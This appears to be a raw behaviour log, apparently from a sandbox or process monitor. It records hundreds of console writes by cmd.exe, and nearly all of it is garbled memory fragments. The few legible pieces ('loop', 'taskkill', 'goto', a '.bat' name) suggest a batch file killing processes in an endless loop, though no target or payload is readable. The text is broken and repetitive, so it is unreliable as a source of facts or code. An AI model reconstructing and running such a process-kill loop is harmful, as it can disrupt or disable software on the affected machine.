Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......<k...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......Bk............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......Qk..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....]k..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......ck......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......ik..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........l..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d........l.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........l...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........l............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........l..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l......l..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d........l......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........l..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......Qn..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......]n.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......cn...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......in............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......xn..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l......n..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d........n......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........n..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........p..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d........p.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........p...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........p............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........p..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l......p..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d........p......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........p..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........r..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d........r.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........r...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........r............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........r..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l......r..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d........r......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........r..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......$u..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......0u.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......6u...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......<u............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......Ku..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....Wu..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......]u......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......cu..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........w..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d........w.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........w...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........x............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........x..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l..... x..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......&x......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......,x..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........y..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d........y.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........y...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........y............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........y..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l......y..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d........z......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........z..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......-{..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......9{.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......?{...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......E{............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......T{..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....`{..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......f{......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......l{..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........\|..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d........\|.......................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........\|...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........\|............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........\|..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l......\|..............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d........\|......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........\|..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......R~..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......^~.......................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......d~...............................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......j~............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......y~..........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l......~..............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d........~......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d........~..............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......-...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....9...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......?.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......E...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......D...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......P........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......V................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......\.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......k...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....w...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......}.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......C...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......O........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......U................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......[.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......j...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....v...............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......\|.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......r...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......~........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......Q...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......]........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......c................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......i.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......x...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......j...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......v........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......\|................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......#.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......)...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......$.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......3...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....?...............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......E.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......K...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......!................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......'.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......6...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....B...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......H.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......N...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......1...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......=........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......C................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......I.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......X...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....d...............................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......j.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......p...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......'...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......3........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......9................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......?.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......N...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....Z...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......`.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......f...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......j...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......v........................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......\|................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d....... ...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......5...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......A........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......G................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......M.............................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......\...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....h...............................<..J.....bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d.......n.......................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......t...............................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d................................................bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d........................................................bNwv8.I....\|........E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.....................................I.......I.........@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d...................................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................t.a.s.k.k.i.l.l.....................................<..J.....bNw..\u\.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.........d...............................................<..J.....bNwv8.I.............E.J....t...
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......................................................@F.JV8.I,............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ................................d.......@...........................d...b.a.t................:.I.............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................g.o.t.o.....d.......L........................................bNw..\u`.............................nw
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .l.o.o.p. .d.......R................................................bNwv8.I....\|........E.J....t...
